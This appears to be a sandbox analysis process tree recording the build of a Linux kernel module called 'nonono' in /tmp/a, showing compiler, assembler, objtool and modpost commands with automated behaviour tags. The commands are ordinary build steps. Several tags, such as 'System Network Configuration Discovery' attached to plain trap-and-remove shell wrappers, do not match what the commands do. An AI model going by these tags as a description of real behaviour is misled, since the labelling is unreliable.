/usr/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/nonono.o /tmp/ccmjDalP.s6⤵PID:1890
-
-
/usr/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/nonono.o /tmp/ccmjDalP.s6⤵
- Writes file to tmp directory
PID:1890
-
-
-
/usr/src/linux-headers-5.15.0-105-generic/scripts/basic/fixdepscripts/basic/fixdep /tmp/a/.nonono.o.d /tmp/a/nonono.o "gcc -Wall -Wp,-MMD,/tmp/a/.nonono.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\"nonono\"' -DKBUILD_MODNAME='\"nonono\"' -D__KBUILD_MODNAME=kmod_nonono -c -o /tmp/a/nonono.o /tmp/a/nonono.c"5⤵PID:1891
-
-
/usr/bin/rmrm -f /tmp/a/.nonono.o.d5⤵PID:1892
-
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/nonono.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1893
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/nonono.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1894
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/nonono.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1895
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/nonono.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.o; trap - PIPE; kill -s PIPE \$\$' PIPE; ./tools/objtool/objtool check --module --retpoline --rethunk --uaccess --sls /tmp/a/nonono.o"4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1896 -
/usr/src/linux-headers-5.15.0-105-generic/tools/objtool/objtool./tools/objtool/objtool check --module --retpoline --rethunk --uaccess --sls /tmp/a/nonono.o5⤵
- Writes file to tmp directory
PID:1897
-
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/nonono.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.o; trap - PIPE; kill -s PIPE \$\$' PIPE; if objdump -h /tmp/a/nonono.o | grep -q __ksymtab; then gcc -E -D__GENKSYMS__ -Wp,-MMD,/tmp/a/.nonono.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\"nonono\"' -DKBUILD_MODNAME='\"nonono\"' -D__KBUILD_MODNAME=kmod_nonono /tmp/a/nonono.c | scripts/genksyms/genksyms -r /dev/null > /tmp/a/.tmp_nonono.ver; ld -m elf_x86_64 -z noexecstack -r -o /tmp/a/.tmp_nonono.o /tmp/a/nonono.o -T /tmp/a/.tmp_nonono.ver; mv -f /tmp/a/.tmp_nonono.o /tmp/a/nonono.o; rm -f /tmp/a/.tmp_nonono.ver; fi"4⤵PID:1898
-
/usr/bin/grepgrep -q __ksymtab5⤵PID:1900
-
-
/usr/bin/objdumpobjdump -h /tmp/a/nonono.o5⤵PID:1899
-
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/nonono.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1901
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/nonono.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1902
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/nonono.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1903
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/nonono.mod; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.mod; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.mod; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.mod; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.mod; trap - PIPE; kill -s PIPE \$\$' PIPE; { echo /tmp/a/nonono.o; echo; } > /tmp/a/nonono.mod; printf '%s\\n' 'cmd_/tmp/a/nonono.mod := { echo /tmp/a/nonono.o; echo; } > /tmp/a/nonono.mod' > /tmp/a/.nonono.mod.cmd"4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1904
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/modules.order; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/modules.order; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/modules.order; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/modules.order; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/modules.order; trap - PIPE; kill -s PIPE \$\$' PIPE; { echo /tmp/a/nonono.ko; :; } | awk '!x[\$0]++' - > /tmp/a/modules.order; printf '%s\\n' 'cmd_/tmp/a/modules.order := { echo /tmp/a/nonono.ko; :; } | awk '\\''!x[\$\$0]++'\\'' - > /tmp/a/modules.order' > /tmp/a/.modules.order.cmd"4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1905 -
/usr/bin/awkawk "!x[\$0]++" -5⤵PID:1907
-
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1908 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1909
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1910 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1911
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1913 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1914
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1915 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1916
-
-
-
/usr/bin/shsh ./scripts/modules-check.sh /tmp/a/modules.order3⤵
- System Network Configuration Discovery
PID:1917 -
/usr/bin/uniquniq -d4⤵PID:1921
-
-
/usr/bin/sortsort4⤵PID:1920
-
-
/usr/bin/sedsed "s:.*/::" /tmp/a/modules.order4⤵PID:1919
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1922 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1923
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1924 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1925
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1927 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1928
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1929 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1930
-
-
-
/usr/bin/makemake -f ./scripts/Makefile.modpost3⤵
- System Network Configuration Discovery
PID:1931 -
/usr/bin/catcat /tmp/a/modules.order4⤵PID:1932
-
-
/bin/sh/bin/sh -c "set -e; echo ' MODPOST /tmp/a/Module.symvers'; trap 'rm -f /tmp/a/Module.symvers; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/Module.symvers; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/Module.symvers; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/Module.symvers; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/Module.symvers; trap - PIPE; kill -s PIPE \$\$' PIPE; sed 's/\\.ko\$/\\.o/' /tmp/a/modules.order | scripts/mod/modpost -m -a -o /tmp/a/Module.symvers -e -i Module.symvers -T -; printf '%s\\n' 'cmd_/tmp/a/Module.symvers := sed '\\''s/\\.ko\$\$/\\.o/'\\'' /tmp/a/modules.order | scripts/mod/modpost -m -a -o /tmp/a/Module.symvers -e -i Module.symvers -T -' > /tmp/a/.Module.symvers.cmd"4⤵
- Writes file to tmp directory
PID:1933 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/mod/modpostscripts/mod/modpost -m -a -o /tmp/a/Module.symvers -e -i Module.symvers -T -5⤵
- Writes file to tmp directory
PID:1935
-
-
/usr/bin/sedsed "s/\\.ko\$/\\.o/" /tmp/a/modules.order5⤵PID:1934
-
-
-
/usr/bin/makemake -f ./scripts/Makefile.modfinal4⤵
- System Network Configuration Discovery
PID:1936 -
/usr/bin/catcat /tmp/a/modules.order5⤵PID:1937
-
-
/bin/sh/bin/sh -c "set -e; echo ' CC [M] /tmp/a/nonono.mod.o'; trap 'rm -f /tmp/a/nonono.mod.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.mod.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.mod.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.mod.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.mod.o; trap - PIPE; kill -s PIPE \$\$' PIPE; gcc -Wall -Wp,-MMD,/tmp/a/.nonono.mod.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\"nonono.mod\"' -DKBUILD_MODNAME='\"nonono\"' -D__KBUILD_MODNAME=kmod_nonono -c -o /tmp/a/nonono.mod.o /tmp/a/nonono.mod.c; scripts/basic/fixdep /tmp/a/.nonono.mod.o.d /tmp/a/nonono.mod.o 'gcc -Wall -Wp,-MMD,/tmp/a/.nonono.mod.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\\''\"nonono.mod\"'\\'' -DKBUILD_MODNAME='\\''\"nonono\"'\\'' -D__KBUILD_MODNAME=kmod_nonono -c -o /tmp/a/nonono.mod.o /tmp/a/nonono.mod.c' > /tmp/a/.nonono.mod.o.cmd; rm -f /tmp/a/.nonono.mod.o.d"5⤵PID:1938
-
/usr/bin/gccgcc -Wall "-Wp,-MMD,/tmp/a/.nonono.mod.o.d" -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ "-fmacro-prefix-map=./=" -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wno-packed-not-aligned "-fsanitize=bounds" "-fsanitize=shift" "-fsanitize=bool" "-fsanitize=enum" -DMODULE "-DKBUILD_BASENAME=\"nonono.mod\"" "-DKBUILD_MODNAME=\"nonono\"" "-D__KBUILD_MODNAME=kmod_nonono" -c -o /tmp/a/nonono.mod.o /tmp/a/nonono.mod.c6⤵
- Writes file to tmp directory
PID:1939 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -nostdinc -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY -D MODULE -D "KBUILD_BASENAME=\"nonono.mod\"" -D "KBUILD_MODNAME=\"nonono\"" -D "__KBUILD_MODNAME=kmod_nonono" -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -include ./include/linux/compiler_types.h -MMD /tmp/a/.nonono.mod.o.d /tmp/a/nonono.mod.c -quiet -dumpdir /tmp/a/ -dumpbase nonono.mod.c -dumpbase-ext .c -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wno-packed-not-aligned "-std=gnu90" -p "-fmacro-prefix-map=./=" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack "-fsanitize=bounds" "-fsanitize=shift" "-fsanitize=bool" "-fsanitize=enum" -fstack-protector-strong -o /tmp/ccrkFQiw.s7⤵
- Writes file to tmp directory
PID:1940
-
-
/usr/local/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/nonono.mod.o /tmp/ccrkFQiw.s7⤵PID:1941
-
-
/usr/local/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/nonono.mod.o /tmp/ccrkFQiw.s7⤵PID:1941
-
-
/usr/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/nonono.mod.o /tmp/ccrkFQiw.s7⤵PID:1941
-
-
/usr/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/nonono.mod.o /tmp/ccrkFQiw.s7⤵
- Writes file to tmp directory
PID:1941
-
-
-
/usr/src/linux-headers-5.15.0-105-generic/scripts/basic/fixdepscripts/basic/fixdep /tmp/a/.nonono.mod.o.d /tmp/a/nonono.mod.o "gcc -Wall -Wp,-MMD,/tmp/a/.nonono.mod.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation 